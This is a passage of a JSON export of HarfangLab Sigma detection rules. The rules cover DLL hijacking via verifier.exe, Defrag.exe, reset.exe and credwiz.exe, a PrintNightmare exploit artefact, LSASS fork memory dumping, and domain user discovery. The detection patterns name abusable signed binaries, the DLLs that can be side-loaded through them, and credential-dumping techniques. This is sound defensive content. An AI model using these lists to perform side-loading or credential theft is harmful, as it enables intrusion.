"https://github.com/xforcered/WFH",
"https://wietze.github.io/blog/save-the-environment-variables",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_verifier.yml",
"content": "title: DLL Hijacking via verifier.exe\nid: f5bcc588-5876-4367-bd97-d6c7914e8009\ndescription: |\n Detects potential Windows DLL Hijacking via verifier.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://wietze.github.io/blog/save-the-environment-variables\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'verifier.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\davclnt.dll'\n - '\\drprov.dll'\n - '\\ntlanman.dll'\n - '\\p9np.dll'\n - '\\propsys.dll'\n - '\\windows.storage.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "f5bcc588-5876-4367-bd97-d6c7914e8009",
"rule_name": "DLL Hijacking via verifier.exe",
"rule_description": "Detects potential Windows DLL hijacking via verifier.exe, a Microsoft-signed binary that attackers can copy next to a planted DLL so that the DLL is loaded in place of the expected system library.\nDLL hijacking takes advantage of the default Windows DLL search order by positioning a copy of a legitimate application and a malicious DLL alongside each other; this rule matches verifier.exe loading one of the libraries listed in the rule (davclnt.dll, drprov.dll, ntlanman.dll, p9np.dll, propsys.dll, windows.storage.dll) from outside the Windows system directories.\nLoads of libraries that carry a 'Microsoft Windows' signature or that reside under System32, SysWOW64 or WinSxS are filtered out, as are instances of verifier.exe running from those directories, so a side-loaded DLL that is itself Microsoft-signed, or one written into a system directory, is not flagged by this rule.\nIt is recommended to investigate the loaded library (path, hash, signature, creation time) for malicious content, determine how the copy of verifier.exe reached its location and what launched it, and review the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "f5e3e1e8-5937-4413-a606-893a66c8dbdc",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.097262Z",
"creation_date": "2026-03-23T11:45:34.097264Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.097269Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_defrag.yml",
"content": "title: DLL Hijacking via Defrag.exe\nid: f5e3e1e8-5937-4413-a606-893a66c8dbdc\ndescription: |\n Detects potential Windows DLL Hijacking via Defrag.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'Defrag.EXE'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\sxshared.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "f5e3e1e8-5937-4413-a606-893a66c8dbdc",
"rule_name": "DLL Hijacking via Defrag.exe",
"rule_description": "Detects potential Windows DLL Hijacking via Defrag.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "f5f40316-6c92-4983-b686-64dbfc197b4e",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.072303Z",
"creation_date": "2026-03-23T11:45:34.072305Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.072309Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/calebstewart/CVE-2021-1675",
"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-1675",
"https://attack.mitre.org/techniques/T1547/012/"
],
"name": "t1547_012_possible_printnightmare_exploit.yml",
"content": "title: Possible PrintNightmare Privilege Escalation Exploit\nid: f5f40316-6c92-4983-b686-64dbfc197b4e\ndescription: |\n Detects exploitation of the PrintNightmare vulnerability (CVE-2021-1675) by the creation of a DLL used in common public PoCs.\n The Windows Print Spooler service is a critical component present on all Windows systems that manages print queues and is an attractive target for attackers due to its privileged nature.\n It is recommended to verify the origin of detected suspicious DLL, examine Windows Event logs for Print Spooler activity, and ensure all patches for CVE-2021-1675 are installed.\nreferences:\n - https://github.com/calebstewart/CVE-2021-1675\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-1675\n - https://attack.mitre.org/techniques/T1547/012/\ndate: 2022/09/29\nmodified: 2025/04/15\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.persistence\n - attack.t1547.012\n - cve.2021-1675\n - classification.Windows.Source.Filesystem\n - classification.Windows.Exploit.PrintNightmare\n - classification.Windows.Exploit.CVE-2021-1675\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n product: windows\n category: filesystem_create\ndetection:\n selection:\n Path: '?:\\Users\\\\*\\AppData\\Local\\Temp\\nightmare.dll'\n\n condition: selection\nlevel: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "f5f40316-6c92-4983-b686-64dbfc197b4e",
"rule_name": "Possible PrintNightmare Privilege Escalation Exploit",
"rule_description": "Detects exploitation of the PrintNightmare vulnerability (CVE-2021-1675) by the creation of a DLL used in common public PoCs.\nThe Windows Print Spooler service is a critical component present on all Windows systems that manages print queues and is an attractive target for attackers due to its privileged nature.\nIt is recommended to verify the origin of the detected suspicious DLL, examine Windows Event logs for Print Spooler activity, and ensure all patches for CVE-2021-1675 are installed.\n",
"rule_creation_date": "2022-09-29",
"rule_modified_date": "2025-04-15",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1547.012"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "f637a7d1-4033-423f-9039-21c145a13eb2",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.078116Z",
"creation_date": "2026-03-23T11:45:34.078118Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.078123Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/D4stiny/ForkPlayground/",
"https://billdemirkapi.me/abusing-windows-implementation-of-fork-for-stealthy-memory-operations/",
"https://attack.mitre.org/techniques/T1003/001/"
],
"name": "t1003_001_lsass_fork_memory_dump.yml",
"content": "title: Possible LSASS Forked Process Accessed\nid: f637a7d1-4033-423f-9039-21c145a13eb2\ndescription: |\n Detects an access to an lsass.exe process that is itself a child of lsass.exe.\n Adversaries may create a fork of the lsass.exe process and dump its memory instead of accessing the original lsass.exe memory as a way to bypass detection.\n It is recommended to analyze the source process for malicious behavior, such as accessing both lsass.exe processes or dropping suspicious files to disk.\nreferences:\n - https://github.com/D4stiny/ForkPlayground/\n - https://billdemirkapi.me/abusing-windows-implementation-of-fork-for-stealthy-memory-operations/\n - https://attack.mitre.org/techniques/T1003/001/\ndate: 2024/02/13\nmodified: 2025/04/15\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1003.001\n - classification.Windows.Source.ProcessAccess\n - classification.Windows.Behavior.LSASSAccess\n - classification.Windows.Behavior.PrivilegeEscalation\n - classification.Windows.Behavior.CredentialAccess\nlogsource:\n product: windows\n category: process_access\ndetection:\n selection:\n TargetProcessImage|endswith: '\\lsass.exe'\n TargetProcessParentImage|endswith: '\\lsass.exe'\n\n filter_wer:\n ProcessImage:\n - '?:\\Windows\\System32\\wermgr.exe'\n - '?:\\Windows\\system32\\WerFault.exe'\n ProcessSignature : 'Microsoft Windows'\n ProcessSigned: 'true'\n\n filter_taskmgr:\n ProcessImage: '?:\\Windows\\System32\\Taskmgr.exe'\n ProcessSignature : 'Microsoft Windows'\n ProcessSigned: 'true'\n\n filter_lsass:\n ProcessImage: '?:\\Windows\\System32\\lsass.exe'\n ProcessSignature : 'Microsoft Windows Publisher'\n ProcessSigned: 'true'\n\n exclusion_programfiles:\n ProcessImage|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n ProcessSigned: 'true'\n\n exclusion_ccmexec:\n ProcessImage: '?:\\Windows\\CCM\\CcmExec.exe'\n ProcessSignature : 'Microsoft Corporation'\n ProcessSigned: 'true'\n\n exclusion_defender:\n ProcessImage: 
'?:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\\\*\\MsMpEng.exe'\n ProcessSignature :\n - 'Microsoft Windows Publisher'\n - 'Microsoft Windows'\n - 'Microsoft Corporation'\n ProcessSigned: 'true'\n\n exclusion_trendmicro:\n ProcessProcessName:\n - 'TmCCSF.exe'\n # C:\\Program Files (x86)\\Trend Micro\\Security Agent\\Ntrtscan.exe\n - 'Ntrtscan.exe'\n - 'coreServiceShell.exe' # C:\\Program Files\\Trend Micro\\AMSP\\coreServiceShell.exe\n - 'TMBMSRV.exe' # C:\\Program Files (x86)\\Trend Micro\\BM\\TMBMSRV.exe\n ProcessSigned: 'true'\n ProcessSignature: 'Trend Micro, Inc.'\n\n exclusion_landesk:\n ProcessProcessName: 'SoftMon.exe'\n ProcessSigned: 'true'\n ProcessSignature:\n - 'LANDesk Software, Inc.'\n - 'Ivanti, Inc.' # bought by Ivanti\n\n exclusion_nvidia:\n ProcessImage: '?:\\Windows\\System32\\DriverStore\\FileRepository\\nvbl.inf_amd64_*\\NVWMI\\nvWmi64.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'NVIDIA Corporation'\n\n exclusion_rdrleakdiag:\n ProcessCommandLine:\n - '*\\RdrLeakDiag.exe -p * -h 25 -tp 2 -cleanup -watson -unnamed'\n - '*\\RdrLeakDiag.exe -p * -h 25 -tp 2 -cleanup -watson -unnamed -wait 240'\n ProcessParentImage: '?:\\Windows\\System32\\taskhostw.exe'\n\n exclusion_rhs:\n ProcessImage: '?:\\Windows\\Cluster\\rhs.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows'\n\n exclusion_wmi:\n ProcessImage: '?:\\Windows\\System32\\wbem\\WmiPrvSE.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows'\n\n exclusion_svchost_werfault:\n ProcessCommandLine: '?:\\WINDOWS\\System32\\svchost.exe -k WerSvcGroup'\n ProcessSigned: 'true'\n ProcessSignature:\n - 'Microsoft Windows'\n - 'Microsoft Windows Publisher'\n - 'Microsoft Corporation'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "f637a7d1-4033-423f-9039-21c145a13eb2",
"rule_name": "Possible LSASS Forked Process Accessed",
"rule_description": "Detects access to an lsass.exe process that is itself a child of lsass.exe.\nAdversaries may create a fork of the lsass.exe process and dump its memory instead of accessing the original lsass.exe memory as a way to bypass detection.\nIt is recommended to analyze the source process for malicious behavior, such as accessing both lsass.exe processes or dropping suspicious files to disk.\n",
"rule_creation_date": "2024-02-13",
"rule_modified_date": "2025-04-15",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access"
],
"rule_technique_tags": [
"attack.t1003.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "f6687c5a-692b-4cd8-8ca8-3ee859842043",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "low",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.624167Z",
"creation_date": "2026-03-23T11:45:34.624169Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.624173Z",
"rule_level": "low",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://thedfirreport.com/2023/10/30/netsupport-intrusion-results-in-domain-compromise/",
"https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc771865(v=ws.11)",
"https://attack.mitre.org/techniques/T1087/002/"
],
"name": "t1087_002_net_user_domain.yml",
"content": "title: Domain User List Discovered\nid: f6687c5a-692b-4cd8-8ca8-3ee859842043\ndescription: |\n Detect the execution of the \"net user\" command with the \"/domain\" parameter.\n This command is often used by attackers to list all users in an Active Directory domain during discovery phase.\n It is recommended to analyze the grandparent process and its context as well as to correlate this alert with other discovery commands executed around it.\nreferences:\n - https://thedfirreport.com/2023/10/30/netsupport-intrusion-results-in-domain-compromise/\n - https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc771865(v=ws.11)\n - https://attack.mitre.org/techniques/T1087/002/\ndate: 2021/04/28\nmodified: 2026/02/13\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1087.002\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.ActiveDirectory\n - classification.Windows.Behavior.Discovery\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_bin:\n - Image|endswith: '\\net1.exe'\n # Renamed binaries\n - OriginalFileName: 'net1.exe'\n\n selection_cmd:\n CommandLine:\n - '?:\\Windows\\system32\\net1 user /do'\n - '?:\\Windows\\system32\\net1 user /dom'\n - '?:\\Windows\\system32\\net1 user /doma'\n - '?:\\Windows\\system32\\net1 user /domai'\n - '?:\\Windows\\system32\\net1 user /domain'\n - '?:\\Windows\\system32\\net1 users /do'\n - '?:\\Windows\\system32\\net1 users /dom'\n - '?:\\Windows\\system32\\net1 users /doma'\n - '?:\\Windows\\system32\\net1 users /domai'\n - '?:\\Windows\\system32\\net1 users /domain'\n\n exclusion_zabbix:\n ProcessAncestors|contains: '?:\\Program Files\\Zabbix Agent\\zabbix_agentd.exe'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: low\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "f6687c5a-692b-4cd8-8ca8-3ee859842043",
"rule_name": "Domain User List Discovered",
"rule_description": "Detects the execution of the \"net user\" command with the \"/domain\" parameter.\nThis command is often used by attackers to list all users in an Active Directory domain during the discovery phase.\nIt is recommended to analyze the grandparent process and its context as well as to correlate this alert with other discovery commands executed around it.\n",
"rule_creation_date": "2021-04-28",
"rule_modified_date": "2026-02-13",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1087.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "f68b1f94-3a14-472e-84c9-c96714963f76",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.076222Z",
"creation_date": "2026-03-23T11:45:34.076224Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.076229Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_reset.yml",
"content": "title: DLL Hijacking via reset.exe\nid: f68b1f94-3a14-472e-84c9-c96714963f76\ndescription: |\n Detects potential Windows DLL Hijacking via reset.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'reset.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\bcd.dll'\n - '\\Cabinet.dll'\n - '\\d3d10warp.dll'\n - '\\d3d11.dll'\n - '\\dbgcore.DLL'\n - '\\DismApi.DLL'\n - '\\dxgi.dll'\n - '\\FVEAPI.dll'\n - '\\licensemanagerapi.dll'\n - '\\logoncli.dll'\n - '\\netutils.dll'\n - '\\ReAgent.dll'\n - '\\REGAPI.dll'\n - '\\ResetEngine.dll'\n - '\\samcli.dll'\n - '\\srvcli.dll'\n - '\\tbs.dll'\n - '\\utildll.dll'\n - '\\VSSAPI.DLL'\n - '\\VssTrace.DLL'\n - '\\WDSCORE.dll'\n - '\\wevtapi.dll'\n - '\\WIMGAPI.DLL'\n - '\\WINHTTP.dll'\n - '\\WINSTA.dll'\n - '\\WOFUTIL.dll'\n - '\\XmlLite.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - 
'?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "f68b1f94-3a14-472e-84c9-c96714963f76",
"rule_name": "DLL Hijacking via reset.exe",
"rule_description": "Detects potential Windows DLL Hijacking via reset.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "f69bcc31-c92a-4c96-b91e-5cf99664b104",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.601716Z",
"creation_date": "2026-03-23T11:45:34.601719Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.601727Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.welivesecurity.com/2021/06/10/backdoordiplomacy-upgrading-quarian-turian/",
"https://twitter.com/sbousseaden/status/1213116771663777799",
"https://www.malwarebytes.com/blog/threat-intelligence/2021/12/sidecopy-apt-connecting-lures-to-victims-payloads-to-infrastructure",
"https://sebdraven.medium.com/copy-cat-of-apt-sidewinder-1893059ca68d",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_credwiz.yml",
"content": "title: DLL Hijacking via credwiz.exe\nid: f69bcc31-c92a-4c96-b91e-5cf99664b104\ndescription: |\n Detects potential Windows DLL Hijacking via credwiz.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying the legitimate credwiz executable alongside a malicious New.dll.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.welivesecurity.com/2021/06/10/backdoordiplomacy-upgrading-quarian-turian/\n - https://twitter.com/sbousseaden/status/1213116771663777799\n - https://www.malwarebytes.com/blog/threat-intelligence/2021/12/sidecopy-apt-connecting-lures-to-victims-payloads-to-infrastructure\n - https://sebdraven.medium.com/copy-cat-of-apt-sidewinder-1893059ca68d\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/08/22\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'credwiz.exe'\n ImageLoaded|endswith:\n - '\\New.dll'\n - '\\DUser.dll'\n - '\\msctfmonitor.dll'\n - '\\netutils.dll'\n - '\\samcli.dll'\n\n filter_legitimate_image:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n\n filter_signature_imageloaded:\n Signed: 'true'\n Company: 'Microsoft Corporation'\n\n condition: selection and not 1 of filter_*\nlevel: 
high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "f69bcc31-c92a-4c96-b91e-5cf99664b104",
"rule_name": "DLL Hijacking via credwiz.exe",
"rule_description": "Detects potential Windows DLL Hijacking via credwiz.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying the legitimate credwiz executable alongside a malicious New.dll.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-08-22",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "f69e4e20-02c1-4ae3-bd22-b8388e34350f",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
